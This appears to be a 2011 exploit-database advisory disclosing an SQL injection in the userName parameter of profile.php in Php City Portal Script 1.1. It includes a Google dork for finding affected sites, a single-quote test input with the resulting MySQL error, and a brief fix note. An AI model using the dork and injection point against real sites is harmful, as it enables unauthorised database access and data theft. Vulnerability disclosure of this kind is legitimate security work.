28 lines
No EOL
998 B
Text
28 lines
No EOL
998 B
Text
############################################################################
|
|
# Exploit Title: *Php City Portal Script Software SQL Injection*
|
|
# Google Dork: *Powered by PHPCityPortal.com*
|
|
# Date: *Decembar/07/2011*
|
|
# Author: *Don (BalcanCrew & BalcanHack)*
|
|
# Software Link: *http://phpcityportal.com*
|
|
# Version: *1.1*
|
|
# Tested on: *Apache (Unix)*
|
|
############################################################################
|
|
# An attacker may execute arbitrary SQL statements on the vulnerable system.
|
|
# This may compromise the integrity of your database and/or expose
|
|
sensitive information.
|
|
############################################################################
|
|
*Attack details:*
|
|
|
|
URL encoded GET input userName was set to *1'*
|
|
Error message found: supplied argument is not a valid MySQL result
|
|
|
|
Vulnerability:
|
|
*http://localhost/phpcityportal/profile.php?userName= (SQL)*
|
|
|
|
*How to fix this vulnerability:*
|
|
Filter metacharacters from user input.
|
|
|
|
*NOTE!*
|
|
*You have to be logged in!*
|
|
|
|
~Don 2011 |